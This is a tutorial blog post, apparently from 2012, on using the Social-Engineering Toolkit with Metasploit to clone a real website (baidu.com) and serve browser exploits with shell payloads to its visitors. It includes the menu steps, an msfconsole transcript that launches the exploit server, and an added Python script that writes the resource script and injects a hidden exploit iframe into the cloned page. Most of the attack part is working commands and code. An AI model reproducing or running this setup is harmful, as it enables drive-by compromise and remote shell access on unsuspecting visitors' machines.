22 SET: attacking in combination with Metasploit
Posted 2012-8-6 17:07:20

See the videos I made (you will need to get past the Great Firewall first):

1. http://www.youtube.com/watch?v=kTSHe3xDvh8&feature=plcp

2. http://www.youtube.com/watch?v=GrlWDWQP9pY&feature=plcp


First stop Apache2, so that SET's own web server can take over the port:

    root@Dis9Team:/pen/set# /etc/init.d/apache2 stop
     * Stopping web server apache2                                                   ... waiting                                                             [ OK ]
    root@Dis9Team:/pen/set#
Start SET:

    root@Dis9Team:/pen/set# ./set
Select:
1) Social-Engineering Attacks
then choose the web attack vectors:
2) Website Attack Vectors
then choose the Metasploit method:
2) Metasploit Browser Exploit Method
which offers three options:

    1) Web Templates
    2) Site Cloner
    3) Custom Import

1 = built-in web templates, 2 = clone a live site, 3 = import your own site. Choose 2) Site Cloner:

    set:webattack>2
    [-] SET supports both HTTP and HTTPS
    [-] Example: http://www.thisisafakesite.com
    set:webattack> Enter the url to clone:
Enter the address to clone: I entered http://www.baidu.com
After pressing Enter, a long list of browser exploits appears:

    set:webattack> Enter the url to clone:http://www.baidu.com

    Enter the browser exploit you would like to use

       1) Java AtomicReferenceArray Type Violation Vulnerability
       2) Adobe Flash Player MP4 "cprt" Overflow
       3) MS12-004 midiOutPlayNextPolyEvent Heap Overflow
       4) Java Applet Rhino Script Engine Remote Code Execution
       5) MS11-050 IE mshtml!CObjectElement Use After Free
       6) Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability
       7) Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute
       8) Internet Explorer CSS Import Use After Free (default)
       9) Microsoft WMI Administration Tools ActiveX Buffer Overflow
      10) Internet Explorer CSS Tags Memory Corruption
      11) Sun Java Applet2ClassLoader Remote Code Execution
      12) Sun Java Runtime New Plugin docbase Buffer Overflow
      13) Microsoft Windows WebDAV Application DLL Hijacker
      14) Adobe Flash Player AVM Bytecode Verification Vulnerability
      15) Adobe Shockwave rcsL Memory Corruption Exploit
      16) Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
      17) Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution
      18) Microsoft Help Center XSS and Command Execution (MS10-042)
      19) Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
      20) Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)
      21) Microsoft Internet Explorer Tabular Data Control Exploit (MS10-018)
      22) Microsoft Internet Explorer 7 Uninitialized Memory Corruption (MS09-002)
      23) Microsoft Internet Explorer Style getElementsbyTagName Corruption (MS09-072)
      24) Microsoft Internet Explorer isComponentInstalled Overflow
      25) Microsoft Internet Explorer Explorer Data Binding Corruption (MS08-078)
      26) Microsoft Internet Explorer Unsafe Scripting Misconfiguration
      27) FireFox 3.5 escape Return Value Memory Corruption
      28) FireFox 3.6.16 mChannel use after free vulnerability
      29) Metasploit Browser Autopwn (USE AT OWN RISK!)

    set:payloads>
Choose "5) MS11-050 IE mshtml!CObjectElement Use After Free". (Note that the msfconsole transcript further down runs `use windows/browser/cisco_anyconnect_exec`, which is option 7 in this list, so the recorded run actually used the Cisco AnyConnect ActiveX module rather than option 5.)
After typing 5 and pressing Enter, choose the payload (the backdoor):

       1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
       2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
       3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
       4) Windows Bind Shell                      Execute payload and create an accepting port on remote system.
       5) Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
       6) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
       7) Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
       8) Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
       9) Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter
      10) Windows Meterpreter Reverse DNS         Use a hostname instead of an IP address and use Reverse Meterpreter
      11) Download/Run your Own Executable        Downloads an executable and runs it
Pick whichever you like; here I choose 2) Windows Reverse_TCP Meterpreter.
After pressing Enter, type the listening port. (The transcript below actually shows option 5 being entered, which is Windows Bind Shell X64; that is why msfconsole later sets `PAYLOAD windows/x64/shell_bind_tcp` and starts a bind handler instead of a reverse handler, and why the port typed here ends up on the victim rather than on the attacker box.)

    set:payloads>5
    set:payloads> Port to use for the reverse [443]:5987

SET moves the payload into the cloned site, then loads msfconsole with a generated resource script (src/program_junk/meta_config) that sets up the exploit module and listener:

    [*] Moving payload into cloned website.
    [*] The site has been moved. SET Web Server is now listening..
    [-] Launching MSF Listener...
    [-] This may take a few to load MSF...
    [-] ***
    [-] * WARNING: Database support has been disabled
    [-] ***

    MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
    MMMMMMMMMMM                MMMMMMMMMM
    MMMN$                           vMMMM
    MMMNl  MMMMM             MMMMM  JMMMM
    MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
    MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
    MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
    MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
    MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
    MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
    MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
    MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
    MMMMR  ?MMNM             MMMMM .dMMMM
    MMMMNm `?MMM             MMMM` dMMMMM
    MMMMMMN  ?MM             MM?  NMMMMMN
    MMMMMMMMNe                 JMMMMMNMMM
    MMMMMMMMMMNm,            eMMMMMNMMNMM
    MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
    MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM

           =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
    + -- --=[ 846 exploits - 475 auxiliary - 142 post
    + -- --=[ 250 payloads - 27 encoders - 8 nops
           =[ svn r15274 updated yesterday (2012.05.15)

    [*] Processing /pen/set/src/program_junk/meta_config for ERB directives.
    resource (/pen/set/src/program_junk/meta_config)> use windows/browser/cisco_anyconnect_exec
    resource (/pen/set/src/program_junk/meta_config)> set PAYLOAD windows/x64/shell_bind_tcp
    PAYLOAD => windows/x64/shell_bind_tcp
    resource (/pen/set/src/program_junk/meta_config)> set LHOST 1.1.1.128
    LHOST => 1.1.1.128
    resource (/pen/set/src/program_junk/meta_config)> set LPORT 5987
    LPORT => 5987
    resource (/pen/set/src/program_junk/meta_config)> set URIPATH /
    URIPATH => /
    resource (/pen/set/src/program_junk/meta_config)> set SRVPORT 8080
    SRVPORT => 8080
    resource (/pen/set/src/program_junk/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (/pen/set/src/program_junk/meta_config)> exploit -j
    [*] Exploit running as background job.
    msf  exploit(cisco_anyconnect_exec) >
    [*] Using URL: http://0.0.0.0:8080/
    [*] Started bind handler
    [*]  Local IP: http://1.1.1.128:8080/
    [*] Server started.

And then, you know the rest:
  • Local IP: http://1.1.1.128:8080/
    Once a vulnerable machine visits the page, the exploit fires and the session comes in. Two things to keep in mind: the exploit server is on SRVPORT 8080 with URIPATH /, while the cloned site is served by SET's own web server (the reason Apache2 was stopped at the start), so the victim is pointed at the clone and the clone pulls in the exploit; and with `ExitOnSession false` plus `exploit -j` the job keeps serving after the first session, so check `sessions -l` in msfconsole rather than waiting for the prompt to change.
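To make the menu walkthrough above concrete, here is an added example (my own code, not part of the original post and not SET's source) that reproduces offline the two things the transcript shows SET doing behind the menus: planting a reference to the Metasploit browser-exploit server in the cloned page ("Moving payload into cloned website"), and writing the msfconsole resource script that the transcript shows being processed from src/program_junk/meta_config. The hidden-iframe injection and the `<base href>` fix-up are my assumptions about how the clone is wired to the exploit server; the page does not show SET's injection code. The HTML sample is constructed here, and the module, payload, host and ports are the values from the transcript.

```python
"""Reproduce, without SET's menus, what the transcript shows SET generating.

Added example: not SET's own code. The iframe injection is an assumed
technique (the page does not show how SET plants the exploit URL).
"""
import re
from pathlib import Path

# Values taken from the msfconsole transcript on the page.
LHOST = "1.1.1.128"
LPORT = 5987
SRVPORT = 8080
URIPATH = "/"
EXPLOIT = "windows/browser/cisco_anyconnect_exec"
PAYLOAD = "windows/x64/shell_bind_tcp"

# Constructed sample of a cloned page; relative links are deliberate,
# because a clone whose CSS and images 404 looks broken to the victim.
SAMPLE_CLONE = (
    '<html><head><title>百度一下</title>\n'
    '<link rel="stylesheet" href="/static/style.css"></head>\n'
    '<body><img src="/img/logo.png"><form action="/s"><input name="wd"></form></body></html>'
)


def build_resource_script(exploit, payload, lhost, lport, srvport, uripath="/"):
    """Return the resource script equivalent to SET's meta_config.

    Reusable with `msfconsole -r meta_config` to relaunch the listener
    without clicking through SET again.
    """
    lines = [
        f"use {exploit}",
        f"set PAYLOAD {payload}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        f"set URIPATH {uripath}",
        f"set SRVPORT {srvport}",
        "set ExitOnSession false",   # keep serving after the first session
        "exploit -j",                # run as a background job
    ]
    return "\n".join(lines) + "\n"


def inject_exploit_frame(cloned_html, origin, exploit_url):
    """Plant a hidden iframe pointing at the Metasploit server in a clone.

    Also inserts <base href=origin> (unless the page already has one) so the
    clone's relative resources still resolve against the real site. Pages
    without <head> or </body> get the base prepended / frame appended, so
    nothing is silently dropped.
    """
    frame = (f'<iframe src="{exploit_url}" width="0" height="0" '
             'frameborder="0" style="display:none"></iframe>')
    base = f'<base href="{origin}">'
    if re.search(r"<base\b", cloned_html, re.I) is None:
        if re.search(r"<head[^>]*>", cloned_html, re.I):
            cloned_html = re.sub(r"<head[^>]*>", lambda m: m.group(0) + base,
                                 cloned_html, count=1, flags=re.I)
        else:
            cloned_html = base + cloned_html
    if re.search(r"</body>", cloned_html, re.I):
        cloned_html = re.sub(r"</body>", lambda m: frame + m.group(0),
                             cloned_html, count=1, flags=re.I)
    else:
        cloned_html += frame
    return cloned_html


def ports_to_free(payload, lport, srvport, set_webserver_port=80):
    """Ports that must be free on the attacker box before starting.

    80 is assumed to be SET's web server port (hence `apache2 stop`), SRVPORT
    is the Metasploit exploit server. LPORT is only needed locally for
    reverse payloads; a bind payload opens LPORT on the victim instead,
    which is why the transcript shows "Started bind handler".
    """
    ports = {set_webserver_port, srvport}
    if "reverse" in payload:
        ports.add(lport)
    return ports


if __name__ == "__main__":
    Path("meta_config").write_text(
        build_resource_script(EXPLOIT, PAYLOAD, LHOST, LPORT, SRVPORT, URIPATH))
    Path("index.html").write_text(
        inject_exploit_frame(SAMPLE_CLONE, "http://www.baidu.com/",
                             f"http://{LHOST}:{SRVPORT}{URIPATH}"))
    print("free these ports first:", sorted(ports_to_free(PAYLOAD, LPORT, SRVPORT)))
    print("then: msfconsole -r meta_config")
```

Running it writes meta_config and index.html into the current directory; the resource script is byte-for-byte the sequence of commands the transcript shows msfconsole processing, and the port check explains why the run starts with stopping Apache2.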


